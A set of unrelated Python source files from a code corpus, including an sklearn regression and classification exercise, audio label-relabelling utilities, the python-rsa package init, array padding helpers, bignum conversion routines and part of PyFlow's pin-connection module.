self.architecture = data["architecture"]
self.id = data["id"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"version": self.version,
"architecture": self.architecture,
"id": self.id
}
class BuildComponents_1_0(Components['BuildComponent_1_0']):
@classmethod
def __create__(self, data: Any) -> 'BuildComponent_1_0':
return BuildComponent_1_0(data)
class BuildComponent_1_0(Component):
def __init__(self, data: Any):
super().__init__(data)
self.repository = data["repository"]
self.ref = data["ref"]
self.commit_id = data["commit_id"]
self.artifacts = data.get("artifacts", {})
self.version = data["version"]
def __to_dict__(self) -> dict:
return {
"name": self.name,
"repository": self.repository,
"ref": self.ref,
"commit_id": self.commit_id,
"artifacts": self.artifacts,
"version": self.version,
}
|
the-stack_0_1617 | # Practical 1
# Load in the California house pricing data and unpack the features and labels
# Import a linear regression model from sklearn
# Fit the model
# Create a fake house's features and predict it's price
# Compute the score of the model on the training data
#%%
from sklearn import linear_model
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn import metrics
import numpy as np
#%%
# X, y = datasets.fetch_california_housing(return_X_y=True)
housing_data = datasets.fetch_california_housing()
X = housing_data.data
y = housing_data.target
print(X.shape)
print(y.shape)
print(housing_data.feature_names)
print(housing_data.DESCR)
#%%
model = linear_model.LinearRegression()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3) # test_size is a proportion of the data you are going to split
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.3) # test_size is a proportion of the data you are going to split
print(len(y))
print(f"num samples y_train: {len(y_train)}")
print(f"num samples y_test: {len(y_test)}")
print(f"num samples y_validation: {len(y_validation)}")
print(len(X))
print(f"num samples X_train: {len(X_train)}")
print(f"num samples X_test: {len(X_test)}")
print(f"num samples X_validation: {len(X_validation)}")
# %%
np.random.seed(2)
model.fit(X_train, y_train)
y_train_pred = model.predict(X_train)
y_validation_pred = model.predict(X_validation)
y_test_pred = model.predict(X_test)
train_loss = metrics.mean_squared_error(y_train, y_train_pred)
validation_loss = metrics.mean_squared_error(y_validation, y_validation_pred)
test_loss = metrics.mean_squared_error(y_test, y_test_pred)
train_score = model.score(X_train, y_train)
validation_score = model.score(X_validation, y_validation)
test_score = model.score(X_test, y_test)
print(
f"{model.__class__.__name__}: "
f"Train score: {train_score}"
f"Validation score: {validation_score}"
f"Test score: {test_score}"
)
#%%
X_fake_house = np.array([[ 6.92710000e+00, 1.90000000e+01, 5.53584906e+00,
9.89245283e-01, 1.72300000e+03, 3.63407547e+00,
2.98100000e+01, -1.37660000e+02]])
y_fake_house_pred = model.predict(X_fake_house)
print(y_fake_house_pred)
# %%
# # %%
# PRACTICAL: Access the sklearn parameters
# Fit a linear regression model to the California housing dataset
# Take a look at the docs, and figure out how to print the weights and bias that this model has learnt for the dataset
# Take a look at the docs for the dataset, and
# Discuss: what does this tell you about the importance of each feature?
print(model.coef_)
print(model.intercept_)
print(housing_data.feature_names)
# %%
# PRACTICAL: Visualise the sklearn parameters
# Take a single feature of the housing dataset
# Scatter plot it against the label in an X-Y graph
# Fit a model to that feature
# Plot your predictions on top (as a line, not a scatter)
# Discuss: what do you expect the weight and bias values to be?
# Access the weight and bias from the model and print them
# Were your expectations correct?
from sklearn.datasets import fetch_california_housing
california_housing = fetch_california_housing(as_frame=True)
california_housing.frame.head()
# %%
import matplotlib.pyplot as plt
california_housing.frame['MedInc'].describe()
california_housing.frame['MedHouseVal'].describe()
subset_df = california_housing.frame[['MedInc','MedHouseVal']]
import matplotlib.pyplot as plt
subset_df.hist(figsize=(12, 10), bins=30, edgecolor="black")
plt.subplots_adjust(hspace=0.7, wspace=0.4)
subset_df.plot(kind='scatter', x='MedInc', y='MedHouseVal', alpha=0.1)
# %%
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
model = LinearRegression()
X = subset_df[['MedInc']]
y = subset_df['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
print(model.coef_)
print(model.intercept_)
print(mean_squared_error(y, y_pred))
print(r2_score(X, y)) # Coeff of determination -1 is best score
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
# %%
# Draw the loss function
# Fit a linear regression model to predict the house prices from one column of the California house price dataset
# Access the weight and bias from the model
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
# Plot the loss agains the parameter value
# Discuss: does it look how you expect?
california_housing.frame.head()
california_housing.frame['AveRooms'].describe()
X = california_housing.frame[['AveRooms']]
y = california_housing.frame['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
weight = model.coef_
print(weight)
bias = model.intercept_
print(bias)
mse = mean_squared_error(y, y_pred)
print(mse)
r2_score = model.score(X, y)
print(r2_score)
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xlabel('AveRooms')
plt.ylabel('MedianHouseVal')
plt.show()
#%%
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
MSE = []
weights = []
for i in range(-10,11):
new_weight = weight + i
weights.append(new_weight)
y_new_pred = new_weight * X + bias
mse = mean_squared_error(y, y_new_pred)
MSE.append(mse)
print(MSE)
print(weights)
plt.scatter(weights, MSE , color="black")
plt.xlabel('weights')
plt.ylabel('MSE')
plt.show()
# %%
weight_adjustment = range(-10,10)
# %%
# Practical - classification dataset
# Load in the breast cancer dataset from sklearn
# Find a classification model in sklearn
# Initialise the model
# Fit the model
# Get the score on the training data
# Print a prediction made by the fitted model
from sklearn import datasets
data = datasets.load_breast_cancer()
print(data.keys())
print(data.DESCR)
import pandas as pd
df = pd.DataFrame(data.data, columns=data.feature_names)
df['target'] = data.target
df.head()
df.info()
# %%
# Store the feature data
X = data.data
# store the target data
y = data.target
# split the data using Scikit-Learn's train_test_split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y)
# %%
from sklearn.neighbors import KNeighborsClassifier
logreg = KNeighborsClassifier(n_neighbors=6)
logreg.fit(X_train, y_train)
logreg.score(X_test, y_test)
# %%
|
the-stack_0_1619 | from audiomate import annotations
from audiomate.utils import textfile
WILDCARD_COMBINATION = ('**',)
class UnmappedLabelsException(Exception):
def __init__(self, message):
super(UnmappedLabelsException, self).__init__(message)
self.message = message
def relabel(label_list, projections):
"""
Relabel an entire :py:class:`~audiomate.annotations.LabelList` using user-defined projections.
Labels can be renamed, removed or overlapping labels can be flattened to a single label per segment.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` is is not
required to specify a projection for every single combination of labels.
This method raises a :py:class:`~audiomate.corpus.utils.labellist.UnmappedLabelsException` if a projection for one
or more combinations of labels is not defined.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
audiomate.annotations.LabelList: New label list with remapped labels
Raises:
UnmappedLabelsException: If a projection for one or more combinations of labels is not defined.
Example:
>>> projections = {
... ('a',): 'a',
... ('b',): 'b',
... ('c',): 'c',
... ('a', 'b',): 'a_b',
... ('a', 'b', 'c',): 'a_b_c',
... ('**',): 'b_c',
... }
>>> label_list = annotations.LabelList(labels=[
... annotations.Label('a', 3.2, 4.5),
... annotations.Label('b', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> ll = relabel(label_list, projections)
>>> [l.value for l in ll]
['a', 'a_b', 'a_b_c', 'b_c', 'c']
"""
unmapped_combinations = find_missing_projections(label_list, projections)
if len(unmapped_combinations) > 0:
raise UnmappedLabelsException('Unmapped combinations: {}'.format(unmapped_combinations))
new_labels = []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
label_mapping = projections[combination] if combination in projections else projections[WILDCARD_COMBINATION]
if label_mapping == '':
continue
new_labels.append(annotations.Label(label_mapping, labeled_segment[0], labeled_segment[1]))
return annotations.LabelList(idx=label_list.idx, labels=new_labels)
def find_missing_projections(label_list, projections):
"""
Finds all combinations of labels in `label_list` that are not covered by an entry in the dictionary of
`projections`. Returns a list containing tuples of uncovered label combinations or en empty list if there are none.
All uncovered label combinations are naturally sorted.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` is is not
required to specify a projection for every single combination of labels.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
List: List of combinations of labels that are not covered by any projection
Example:
>>> ll = annotations.LabelList(labels=[
... annotations.Label('b', 3.2, 4.5),
... annotations.Label('a', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> find_missing_projections(ll, {('b',): 'new_label'})
[('a', 'b'), ('a', 'b', 'c'), ('a', 'c'), ('c',)]
"""
unmapped_combinations = set()
if WILDCARD_COMBINATION in projections:
return []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
if combination not in projections:
unmapped_combinations.add(combination)
return sorted(unmapped_combinations)
def load_projections(projections_file):
"""
Loads projections defined in the given `projections_file`.
The `projections_file` is expected to be in the following format::
old_label_1 | new_label_1
old_label_1 old_label_2 | new_label_2
old_label_3 |
You can define one projection per line. Each projection starts with a list of one or multiple
old labels (separated by a single whitespace) that are separated from the new label by a pipe
(`|`). In the code above, the segment labeled with `old_label_1` will be labeled with
`new_label_1` after applying the projection. Segments that are labeled with `old_label_1`
**and** `old_label_2` concurrently are relabeled to `new_label_2`. All segments labeled with
`old_label_3` are dropped. Combinations of multiple labels are automatically sorted in natural
order.
Args:
projections_file (str): Path to the file with projections
Returns:
dict: Dictionary where the keys are tuples of labels to project to the key's value
Example:
>>> load_projections('/path/to/projections.txt')
{('b',): 'foo', ('a', 'b'): 'a_b', ('a',): 'bar'}
"""
projections = {}
for parts in textfile.read_separated_lines_generator(projections_file, '|'):
combination = tuple(sorted([label.strip() for label in parts[0].split(' ')]))
new_label = parts[1].strip()
projections[combination] = new_label
return projections
|
the-stack_0_1620 | # -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
"""
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2016-03-26"
__version__ = '3.4.1'
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
|
the-stack_0_1622 | import numpy as np
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size/float(batch_size)))
return [(i*batch_size, min(size, (i+1)*batch_size)) for i in range(0, nb_batch)] # zgwang: starting point of each batch
def pad_2d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
return pad_2d_vals(in_vals, size1, size2, dtype=dtype)
def pad_2d_vals(in_vals, dim1_size, dim2_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
cur_in_vals = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(cur_in_vals): cur_dim2_size = len(cur_in_vals)
out_val[i,:cur_dim2_size] = cur_in_vals[:cur_dim2_size]
return out_val
def pad_3d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
size3 = 0
for val in in_vals:
cur_size3 = np.max([len(x) for x in val])
if size3<cur_size3: size3 = cur_size3
return pad_3d_vals(in_vals, size1, size2, size3, dtype=dtype)
def pad_3d_vals(in_vals, dim1_size, dim2_size, dim3_size, dtype=np.int32):
# print(in_vals)
out_val = np.zeros((dim1_size, dim2_size, dim3_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
out_val[i, j, :cur_dim3_size] = in_vals_ij[:cur_dim3_size]
return out_val
def pad_4d_vals(in_vals, dim1_size, dim2_size, dim3_size, dim4_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size, dim3_size, dim4_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
for k in range(cur_dim3_size):
in_vals_ijk = in_vals_ij[k]
cur_dim4_size = dim4_size
if cur_dim4_size > len(in_vals_ijk): cur_dim4_size = len(in_vals_ijk)
out_val[i, j, k, :cur_dim4_size] = in_vals_ijk[:cur_dim4_size]
return out_val
def pad_target_labels(in_val, max_length, dtype=np.float32):
batch_size = len(in_val)
out_val = np.zeros((batch_size, max_length), dtype=dtype)
for i in range(batch_size):
for index in in_val[i]:
out_val[i,index] = 1.0
return out_val
|
the-stack_0_1623 | #
#
# bignum.py
#
# This file is copied from python-filbitlib.
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
"""Bignum routines"""
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
# generic big endian MPI format
def bn_bytes(v, have_ext=False):
ext = 0
if have_ext:
ext = 1
return ((v.bit_length()+7)//8) + ext
def bn2bin(v):
s = bytearray()
i = bn_bytes(v)
while i > 0:
s.append((v >> ((i-1) * 8)) & 0xff)
i -= 1
return s
def bin2bn(s):
l = 0
for ch in s:
l = (l << 8) | ch
return l
def bn2mpi(v):
have_ext = False
if v.bit_length() > 0:
have_ext = (v.bit_length() & 0x07) == 0
neg = False
if v < 0:
neg = True
v = -v
s = struct.pack(b">I", bn_bytes(v, have_ext))
ext = bytearray()
if have_ext:
ext.append(0)
v_bin = bn2bin(v)
if neg:
if have_ext:
ext[0] |= 0x80
else:
v_bin[0] |= 0x80
return s + ext + v_bin
def mpi2bn(s):
if len(s) < 4:
return None
s_size = bytes(s[:4])
v_len = struct.unpack(b">I", s_size)[0]
if len(s) != (v_len + 4):
return None
if v_len == 0:
return 0
v_str = bytearray(s[4:])
neg = False
i = v_str[0]
if i & 0x80:
neg = True
i &= ~0x80
v_str[0] = i
v = bin2bn(v_str)
if neg:
return -v
return v
# filbit-specific little endian format, with implicit size
def mpi2vch(s):
r = s[4:] # strip size
r = r[::-1] # reverse string, converting BE->LE
return r
def bn2vch(v):
return bytes(mpi2vch(bn2mpi(v)))
def vch2mpi(s):
r = struct.pack(b">I", len(s)) # size
r += s[::-1] # reverse string, converting LE->BE
return r
def vch2bn(s):
return mpi2bn(vch2mpi(s))
|
the-stack_0_1624 | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""
.. sidebar:: **Common.py**
**Common.py** is a common definitions file. This file is imported in almost all others files of the program
"""
import re
import math
import time
import inspect
import struct
import weakref
try:
from queue import Queue
except:
from Queue import Queue
import uuid
import sys
from nine import IS_PYTHON2, str
if IS_PYTHON2:
from aenum import IntEnum, Flag, auto, Enum
else:
from enum import IntEnum, Flag, auto, Enum
from PyFlow import findPinClassByType
from PyFlow.Core.version import Version
maxint = 2 ** (struct.Struct('i').size * 8 - 1) - 1
FLOAT_RANGE_MIN = 0.1 + (-maxint - 1.0)
FLOAT_RANGE_MAX = maxint + 0.1
INT_RANGE_MIN = -maxint + 0
INT_RANGE_MAX = maxint + 0
DEFAULT_IN_EXEC_NAME = str('inExec')
DEFAULT_OUT_EXEC_NAME = str('outExec')
DEFAULT_WIDGET_VARIANT = str('DefaultWidget')
REF = str('Reference')
def lerp(start, end, alpha):
"""Performs a linear interpolation
>>> start + alpha * (end - start)
:param start: start the value to interpolate from
:param end: end the value to interpolate to
:param alpha: alpha how far to interpolate
:returns: The result of the linear interpolation
"""
return (start + alpha * (end - start))
def GetRangePct(MinValue, MaxValue, Value):
"""Calculates the percentage along a line from **MinValue** to **MaxValue** that value is.
:param MinValue: Minimum Value
:param MaxValue: Maximum Value
:param Value: Input value
:returns: The percentage (from 0.0 to 1.0) between the two values where input value is
"""
return (Value - MinValue) / (MaxValue - MinValue)
def mapRangeClamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)
"""
ClampedPct = clamp(GetRangePct(InRangeA, InRangeB, Value), 0.0, 1.0)
return lerp(OutRangeA, OutRangeB, ClampedPct)
def mapRangeUnclamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)"""
return lerp(OutRangeA, OutRangeB, GetRangePct(InRangeA, InRangeB, Value))
def sign(x):
"""Returns sign of x. -1 if x is negative, 1 if positive and zero if 0.
>>> x and (1, -1)[x < 0]
"""
return x and (1, -1)[x < 0]
def currentProcessorTime():
if IS_PYTHON2:
return time.clock()
else:
return time.process_time()
def clamp(n, vmin, vmax):
"""Computes the value of the first specified argument clamped to a range defined by the second and third specified arguments
:param n: input Value
:param vmin: MiniMum Value
:param vmax: Maximum Value
:returns: The clamped value of n
"""
return max(min(n, vmax), vmin)
def roundup(x, to):
"""Rounding up to sertain value
>>> roundup(7, 8)
>>> 8
>>> roundup(8, 8)
>>> 8
>>> roundup(9, 8)
>>> 16
:param x: value to round
:param to: value x will be rounded to
:returns: rounded value of x
:rtype: int
"""
return int(math.ceil(x / to)) * to
_currentVersion = Version(sys.version_info.major, sys.version_info.minor, 0)
python32 = Version(3, 2, 0)
if _currentVersion <= python32:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
del list[:]
else:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
list.clear()
def findGoodId(ids):
"""
Finds good minimum unique int from iterable. Starting from 1
:param ids: a collection of occupied ids
:type ids: list|set|tuple
:returns: Unique Id
:rtype: int
"""
if len(ids) == 0:
return 1
ids = sorted(set(ids))
lastID = min(ids)
if lastID > 1:
return 1
for ID in ids:
diff = ID - lastID
if diff > 1:
return lastID + 1
break
lastID = ID
else:
return ID + 1
def wrapStringToFunctionDef(functionName, scriptString, kwargs=None):
"""Generates function string which then can be compiled and executed
Example:
::
wrapStringToFunctionDef('test', 'print(a)', {'a': 5})
Will produce following function:
::
def test(a=5):
print(a)
"""
kwargsString = ""
if kwargs is not None:
for argname, argValue in kwargs.items():
if isinstance(argValue, str):
argValue = "'{}'".format(argValue)
kwargsString += "{0}={1}, ".format(argname, argValue)
kwargsString = kwargsString[:-2]
result = "def {0}({1}):\n".format(functionName, kwargsString)
for scriptLine in scriptString.split('\n'):
result += "\t{}".format(scriptLine)
result += '\n'
return result
def cycleCheck(src, dst):
"""Check for cycle connected nodes
:param src: hand side pin
:type src: :class:`PyFlow.Core.PinBase`
:param dst: hand side pin
:type dst: :class:`PyFlow.Core.PinBase`
:returns: True if cycle deleted
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
start = src
if src in dst.affects:
return True
for i in dst.affects:
if cycleCheck(start, i):
return True
return False
def arePinsConnected(src, dst):
"""Checks if two pins are connected
.. note:: Pins can be passed in any order if **src** pin is :py:class:`PyFlow.Core.Common.PinDirection`, they will be swapped
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase`
:returns: True if Pins are connected
:rtype: bool
"""
if src.direction == dst.direction:
return False
if src.owningNode() == dst.owningNode():
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if dst in src.affects and src in dst.affected_by:
return True
return False
def getConnectedPins(pin):
"""Find all connected Pins to input Pin
:param pin: Pin to search connected pins
:type pin: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: Set of connected pins
:rtype: set(:py:class:`PyFlow.Core.PinBase.PinBase`)
"""
result = set()
if pin.direction == PinDirection.Input:
for lhsPin in pin.affected_by:
result.add(lhsPin)
if pin.direction == PinDirection.Output:
for rhsPin in pin.affects:
result.add(rhsPin)
return result
def pinAffects(lhs, rhs):
"""This function for establish dependencies bitween pins
.. warning:: Used internally, users will hardly need this
:param lhs: First pin to connect
:type lhs: :py:class:`PyFlow.Core.PinBase.PinBase`
:param rhs: Second Pin to connect
:type rhs: :py:class:`PyFlow.Core.PinBase.PinBase`
"""
assert(lhs is not rhs), "pin can not affect itself"
lhs.affects.add(rhs)
rhs.affected_by.add(lhs)
def canConnectPins(src, dst):
"""**Very important fundamental function, it checks if connection between two pins is possible**
:param src: Source pin to connect
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: Destination pin to connect
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connection can be made, and False if connection is not possible
:rtype: bool
"""
if src is None or dst is None:
return False
if src.direction == dst.direction:
return False
if arePinsConnected(src, dst):
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if cycleCheck(src, dst):
return False
if src.isExec() and dst.isExec():
return True
if not src.isArray() and dst.isArray():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not src.canChangeStructure(dst._currStructure, []):
return False
if not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
if not src.canChangeStructure(dst._currStructure, [], selfCheck=False):
return False
if not src.isDict() and dst.isDict():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not (src.canChangeStructure(dst._currStructure, []) or dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
return False
elif not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.optionEnabled(PinOptions.SupportsOnlyArrays) and not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
return False
else:
DictElement = src.getDictElementNode([])
dictNode = dst.getDictNode([])
nodeFree = False
if dictNode:
nodeFree = dictNode.KeyType.checkFree([])
if DictElement:
if not DictElement.key.checkFree([]) and not nodeFree:
if dst._data.keyType != DictElement.key.dataType:
return False
if src.isArray() and not dst.isArray():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.ArraySupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if src.isDict() and not dst.isDict():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.DictSupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections) and dst.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections) and src.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.owningNode().graph() is None or dst.owningNode().graph() is None:
return False
if src.owningNode().graph() is not dst.owningNode().graph():
return False
if src.isAny() and dst.isExec():
if src.dataType not in dst.supportedDataTypes():
return False
if src.isExec() and not dst.isExec():
return False
if not src.isExec() and dst.isExec():
return False
if src.IsValuePin() and dst.IsValuePin():
if src.dataType in dst.allowedDataTypes([], dst._supportedDataTypes) or dst.dataType in src.allowedDataTypes([], src._supportedDataTypes):
a = src.dataType == "AnyPin" and not src.canChangeTypeOnConnection([], src.optionEnabled(PinOptions.ChangeTypeOnConnection), [])
b = dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
c = not dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
if all([a, b or c]):
return False
if not src.isDict() and dst.supportOnlyDictElement([], dst.isDict()) and not (dst.checkFree([], selfCheck=False) and dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
if not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.supportOnlyDictElement([], dst.isDict()):
return False
return True
else:
if src.dataType not in dst.supportedDataTypes():
return False
if all([src.dataType in list(dst.allowedDataTypes([], dst._defaultSupportedDataTypes, selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections), defaults=True)) + ["AnyPin"],
dst.checkFree([], selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections))]):
return True
if all([dst.dataType in list(src.allowedDataTypes([], src._defaultSupportedDataTypes, defaults=True)) + ["AnyPin"],
src.checkFree([])]):
return True
return False
if src.owningNode == dst.owningNode:
return False
return True
def connectPins(src, dst):
"""**Connects two pins**
This are the rules how pins connect:
* Input value pins can have one output connection if :py:class:`PyFlow.Core.Common.PinOptions.AllowMultipleConnections` flag is disabled
* Output value pins can have any number of connections
* Input execs can have any number of connections
* Output execs can have only one connection
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connected Successfully
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
if not canConnectPins(src, dst):
return False
# input value pins can have one output connection if `AllowMultipleConnections` flag is disabled
# output value pins can have any number of connections
if src.IsValuePin() and dst.IsValuePin():
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections):
dst.disconnectAll()
# input execs can have any number of connections
# output execs can have only one connection
if src.isExec() and dst.isExec():
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections):
src.disconnectAll()
if src.isExec() and dst.isExec():
src.onExecute.connect(dst.call)
dst.aboutToConnect(src)
src.aboutToConnect(dst)
pinAffects(src, dst)
src.setDirty()
dst.setData(src.currentData())
dst.pinConnected(src)
src.pinConnected(dst)
push(dst)
return True
def connectPinsByIndexes(lhsNode=None, lhsOutPinIndex=0, rhsNode=None, rhsInPinIndex=0):
"""Connects pins regardless name.
This function uses pin locations on node. Top most pin have position index 1, pin below - 2 etc.
:param lhsNode: Left hand side node
:type lhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param lhsOutPinIndex: Out pin position on left hand side node
:type lhsOutPinIndex: int
:param rhsNode: Right hand side node
:type rhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param rhsInPinIndex: Out pin position on right hand side node
:type rhsInPinIndex: int
"""
if lhsNode is None:
return False
if rhsNode is None:
return False
if lhsOutPinIndex not in lhsNode.orderedOutputs:
return False
if rhsInPinIndex not in rhsNode.orderedInputs:
return False
lhsPin = lhsNode.orderedOutputs[lhsOutPinIndex]
rhsPin = rhsNode.orderedInputs[rhsInPinIndex]
return connectPins(lhsPin, rhsPin)
def traverseConstrainedPins(startFrom, callback):
"""Iterate over constrained and connected pins
Iterates over all constrained chained pins of type :class:`Any <PyFlow.Packages.PyFlowBase.Pins.AnyPin.AnyPin>` and passes pin into callback function. Callback will be executed once for every pin
:param startFrom: First pin to start Iteration
:type startFrom: :class:`~PyFlow.Core.PinBase.PinBase`
:param callback: Functor to execute in each iterated pin.
:type callback: callback(:class:`~PyFlow.Core.PinBase.PinBase`)
"""
if not startFrom.isAny():
return
traversed = set()
def worker(pin):
traversed.add(pin)
callback(pin)
if pin.constraint is None:
nodePins = set()
else:
nodePins = set(pin.owningNode().constraints[pin.constraint])
for connectedPin in getConnectedPins(pin):
if connectedPin.isAny():
nodePins.add(connectedPin)
for neighbor in nodePins:
if neighbor not in traversed:
worker(neighbor)
worker(startFrom)
def disconnectPins(src, dst):
"""Disconnects two pins
:param src: left hand side pin
:type src: :py:class:`~PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`~PyFlow.Core.PinBase.PinBase`
:returns: True if disconnection success
:rtype: bool
"""
if arePinsConnected(src, dst):
if src.direction == PinDirection.Input:
src, dst = dst, src
src.affects.remove(dst)
